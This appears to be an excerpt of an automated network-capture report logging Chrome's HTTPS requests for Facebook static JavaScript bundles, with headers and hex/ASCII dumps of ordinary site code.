                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: EipL6LNMTmRE2pcO+6T+NCwYXCkXz+y+mHs9M+0SJxaErn0oTasef/FTz8oQLtfUPba2zKPYSagYgO/xLp62YQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:25 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 51589
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 44 53 69 67 6e 61 6c 42 75 66 66 65 72 44 61 74 61 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 7b 7d 3b 62 3d 61 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 53 69 67 6e 61 6c 56 61 6c 75 65 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 63 6e 3d 61 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 53 69 67 6e 61 6c 56 61 6c 75 65 43 6f 6e 74 65 78 74
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("BDSignalBufferData",[],(function(a,b,c,d,e,f){"use strict";a={};b=a;f["default"]=b}),66);__d("SignalValueContext",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(a){this.cn=a}var b=a.prototype;b.getSignalValueContext
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC16384INData Raw: 6c 6c 65 63 74 53 69 67 6e 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 21 3d 6e 75 6c 6c 3b 61 26 26 74 68 69 73 2e 70 61 75 73 65 4c 69 73 74 65 6e 65 72 73 28 29 3b 61 3d 6e 65 77 28 63 28 22 42 6f 6f 6c 65 61 6e 53 69 67 6e 61 6c 56 61 6c 75 65 54 79 70 65 22 29 29 28 44 61 74 65 2e 6e 6f 77 28 29 2c 74 68 69 73 2e 67 65 74 43 6f 6e 74 65 78 74 28 29 2c 61 29 3b 61 3d 7b 73 69 67 6e 61 6c 49 64 3a 74 68 69 73 2e 73 69 67 6e 61 6c 54 79 70 65 2c 64 61 74 61 3a 7b 76 61 6c 75 65 4f 72 45 72 72 6f 72 3a 61 7d 7d 3b 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 64 28 22 42 44 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 6f 72 42 61 73 65 22 29 2e 42 49 4f 4d
                                                                                                                                                                                                                                Data Ascii: llectSignals=function(a){a=a!=null;a&&this.pauseListeners();a=new(c("BooleanSignalValueType"))(Date.now(),this.getContext(),a);a={signalId:this.signalType,data:{valueOrError:a}};window.dispatchEvent(new CustomEvent(d("BDBiometricSignalCollectorBase").BIOM
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC16384INData Raw: 44 5f 42 55 46 46 45 52 5f 53 49 5a 45 2c 7b 73 69 7a 65 3a 61 2e 74 6f 53 74 72 69 6e 67 28 29 2c 74 79 70 65 3a 22 64 22 7d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 67 65 74 44 79 6e 61 6d 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 79 6e 61 6d 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 7d 3b 62 2e 73 65 74 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3e 31 3f 74 68 69 73 2e 62 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 61 3a 64 28 22 42 44 4f 70 65 72 61 74 69 6f 6e 4c 6f 67 48 65 6c 70 65 72 22 29 2e 6c 6f 67 45 72 72 6f 72 28 68 2c 64 28 22 42
                                                                                                                                                                                                                                Data Ascii: D_BUFFER_SIZE,{size:a.toString(),type:"d"});return this};b.getDynamicSignalBufferSize=function(){return this.dynamicSignalBufferSize};b.setBiometricSignalBufferSize=function(a){a>1?this.biometricSignalBufferSize=a:d("BDOperationLogHelper").logError(h,d("B
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC2948INData Raw: 26 26 78 2e 67 65 74 48 65 61 72 74 62 65 61 74 49 6e 74 65 72 76 61 6c 4d 73 28 29 3e 30 26 26 28 7a 2e 63 6f 6c 6c 65 63 74 48 65 61 72 74 62 65 61 74 54 69 6d 65 73 28 71 2c 72 29 2c 70 21 3d 3d 30 26 26 28 77 69 6e 64 6f 77 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 70 29 2c 64 28 22 42 44 4f 70 65 72 61 74 69 6f 6e 4c 6f 67 48 65 6c 70 65 72 22 29 2e 6c 6f 67 57 61 72 6e 69 6e 67 28 6a 2c 64 28 22 42 44 4c 6f 67 67 69 6e 67 43 6f 6e 73 74 61 6e 74 73 22 29 2e 4f 50 45 52 41 54 49 4f 4e 53 2e 48 42 5f 41 4c 52 45 41 44 59 5f 52 55 4e 4e 49 4e 47 29 29 2c 70 3d 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a 2e 63 6f 6c 6c 65 63 74 48 65 61 72 74 62 65 61 74 54 69 6d 65 73 28 71 2c 72
                                                                                                                                                                                                                                Data Ascii: &&x.getHeartbeatIntervalMs()>0&&(z.collectHeartbeatTimes(q,r),p!==0&&(window.clearInterval(p),d("BDOperationLogHelper").logWarning(j,d("BDLoggingConstants").OPERATIONS.HB_ALREADY_RUNNING)),p=window.setInterval(function(){return z.collectHeartbeatTimes(q,r


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                85192.168.2.449836157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC374OUTGET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: cxEZEvS096W1UB3HTVACWw==
                                                                                                                                                                                                                                Expires: Thu, 18 Sep 2025 21:22:42 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: i4+km8DYuZQz015P5cIc5L7Lyhond4adEmSVXhj0LDSVEis7uX/sax/AThxEtZIVf6Rbqvee9x1L5z6vir+dVA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:25 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 18154
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC16384INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 74 33 68 4f 4c 73 38 77 6c 58 79 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 6a 61 76 61 73 63 72 69 70 74 2d 62 6c 6f 77 66 69 73 68 2d 31 2e 30 2e 35 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 6b 65 79 3d 62 2c 28 63 3d 3d 3d 22 65 63 62 22 7c 7c 63 3d 3d 3d 22 63 62 63 22 29 26 26 28 74 68
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ */__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(th
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1769INData Raw: 37 34 2c 31 35 33 39 32 34 31 39 34 39 2c 34 35 38 37 38 38 31 36 30 2c 33 34 33 36 33 31 35 30 30 37 2c 31 38 30 37 30 31 36 38 39 31 2c 33 37 31 38 34 30 38 38 33 30 2c 39 37 38 39 37 36 35 38 31 2c 31 30 34 33 36 36 33 34 32 38 2c 33 31 36 35 39 36 35 37 38 31 2c 31 39 32 37 39 39 30 39 35 32 2c 34 32 30 30 38 39 31 35 37 39 2c 32 33 37 32 32 37 36 39 31 30 2c 33 32 30 38 34 30 38 39 30 33 2c 33 35 33 33 34 33 31 39 30 37 2c 31 34 31 32 33 39 30 33 30 32 2c 32 39 33 31 39 38 30 30 35 39 2c 34 31 33 32 33 33 32 34 30 30 2c 31 39 34 37 30 37 38 30 32 39 2c 33 38 38 31 35 30 35 36 32 33 2c 34 31 36 38 32 32 36 34 31 37 2c 32 39 34 31 34 38 34 33 38 31 2c 31 30 37 37 39 38 38 31 30 34 2c 31 33 32 30 34 37 37 33 38 38 2c 38 38 36 31 39 35 38 31 38 2c 31 38
                                                                                                                                                                                                                                Data Ascii: 74,1539241949,458788160,3436315007,1807016891,3718408830,978976581,1043663428,3165965781,1927990952,4200891579,2372276910,3208408903,3533431907,1412390302,2931980059,4132332400,1947078029,3881505623,4168226417,2941484381,1077988104,1320477388,886195818,18


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                86192.168.2.449837157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC385OUTGET /rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: sM5EmPOSTNCaG7HHvhTjEQ==
                                                                                                                                                                                                                                Expires: Tue, 23 Sep 2025 07:44:46 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 07pK/vQLomHsy2Xpwq0Gnc+d4R4YYqiHaBgFPOZ6rPz2i4g1rBVHqvNA/SKlCwTTnr9cCSZCgWCCSNThxof1pg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:25 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=90, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 49381
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC15862INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 72 74 69 6c 6c 65 72 79 53 65 67 6d 65 6e 74 22 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 63 72 3a 39 39 38 35 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 76 61 72 20 69 3d 30 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 7c 7c 68 28 30 2c 31 34 39 36 29 2c 22 63 61 74 65 67 6f 72 79 22 69 6e 20 61 26 26 22 64 65 73 63 72 69 70 74 69 6f 6e 22 69 6e 20 61 7c 7c 68 28 30 2c 33 31 33 38 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 29 2c 74 68 69 73 2e 24 31 3d 21 31 2c 74 68 69 73 2e 24 32 3d 62 61 62 65 6c 48 65 6c 70 65 72 73 5b 22 65 78 74 65 6e 64 73 22 5d 28 7b 7d 2c 61 2c 7b 69 64 3a
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC16384INData Raw: 34 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 33 61 5c 75 30 34 34 36 5c 75 30 34 33 38 5c 75 30 34 34 65 20 49 6e 73 74 61 67 72 61 6d 20 5c 75 30 34 33 38 5c 75 30 34 33 62 5c 75 30 34 33 38 20 5c 75 30 34 33 32 5c 75 30 34 33 37 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 63 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 34 63 20 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 33 39 2d 5c 75 30 34 34 32 5c 75 30 34 33 65 20 5c 75 30 34 33 30 5c 75 30 34 33 61 5c 75 30 34 33 61 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 34 32 2c 20 5c 75 30 34 34 64 5c 75 30 34 34 32 5c 75 30 34 33 65 20 5c 75 30 34 33 63 5c 75 30 34 33 65 5c 75 30 34 34 38 5c 75 30 34 33 35 5c 75 30 34 33 64 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75
                                                                                                                                                                                                                                Data Ascii: 4\u0443\u043d\u043a\u0446\u0438\u044e Instagram \u0438\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u0442\u044c \u0447\u0435\u0439-\u0442\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442, \u044d\u0442\u043e \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC16384INData Raw: 28 61 2e 70 6f 6c 69 63 79 2e 73 3d 3d 3d 31 29 7b 61 2e 74 61 67 73 3d 64 28 22 46 61 6c 63 6f 55 74 69 6c 73 22 29 2e 78 6f 72 42 69 74 6d 61 70 28 28 62 3d 61 2e 74 61 67 73 29 21 3d 6e 75 6c 6c 3f 62 3a 5b 30 2c 30 5d 2c 77 29 3b 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 24 28 61 29 7b 69 66 28 61 3d 3d 3d 22 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 74 2e 68 61 73 28 61 29 29 72 65 74 75 72 6e 20 74 2e 67 65 74 28 61 29 3b 65 6c 73 65 7b 76 61 72 20 62 3d 7b 63 6c 61 69 6d 3a 22 22 7d 2c 63 3d 61 2e 73 70 6c 69 74 28 22 5e 23 22 29 3b 69 66 28 63 2e 6c 65 6e 67 74 68 3e 3d 34 29 7b 76 61 72 20 64 3d 63 5b 30 5d 2c 65 3d 63 5b 31 5d 2c 66 3d 63 5b 32 5d 3b 63 3d 63 5b 33 5d 3b 66 21 3d 3d 22 22 3f 62 3d
                                                                                                                                                                                                                                Data Ascii: (a.policy.s===1){a.tags=d("FalcoUtils").xorBitmap((b=a.tags)!=null?b:[0,0],w);return!0}return!1}function $(a){if(a==="")return null;if(t.has(a))return t.get(a);else{var b={claim:""},c=a.split("^#");if(c.length>=4){var d=c[0],e=c[1],f=c[2];c=c[3];f!==""?b=
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC750INData Raw: 73 65 6e 64 28 29 7d 3b 69 66 28 63 28 22 4e 65 74 77 6f 72 6b 53 74 61 74 75 73 22 29 2e 69 73 4f 6e 6c 69 6e 65 28 29 29 6b 28 29 3b 65 6c 73 65 7b 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 6f 6e 6c 69 6e 65 3b 61 26 26 28 6b 28 29 2c 67 2e 72 65 6d 6f 76 65 28 29 29 7d 3b 67 3d 63 28 22 4e 65 74 77 6f 72 6b 53 74 61 74 75 73 22 29 2e 6f 6e 43 68 61 6e 67 65 28 66 29 7d 7d 7d 2c 63 6c 65 61 6e 4f 6e 4c 6f 67 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 64 28 22 57 65 62 53 74 6f 72 61 67 65 43 6c 65 61 6e 75 70 52 65 61 73 6f 6e 22 29 2e 73 65 74 4c 61 73 74 43 6c 65 61 6e 75 70 52 65 61 73 6f 6e 28 62 29 3b 63 28 22 43 61 63 68 65 53 74 6f 72 61 67 65 22 29 2e 64 69 73 61 62 6c 65 50 65 72 73 69 73 74 65 6e 74 57 72 69 74 65 73 28
                                                                                                                                                                                                                                Data Ascii: send()};if(c("NetworkStatus").isOnline())k();else{f=function(a){a=a.online;a&&(k(),g.remove())};g=c("NetworkStatus").onChange(f)}}},cleanOnLogout:function(a,b){d("WebStorageCleanupReason").setLastCleanupReason(b);c("CacheStorage").disablePersistentWrites(


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                87192.168.2.449838157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC385OUTGET /rsrc.php/v3iKIu4/yy/l/ru_RU/lW1EzoN7_Oc.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1931INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: xDxvLqQnuVOQBwOPhCii3w==
                                                                                                                                                                                                                                Expires: Mon, 29 Sep 2025 04:53:24 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: DiHqjnlB3qzz7UQu4G0wSk05SvoJw8Noc8SwkgPErOOsw5NA/8YZUPoZJ8itxLpgPekWyrdrIL0vABXxdgqDxg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:25 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 102543
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
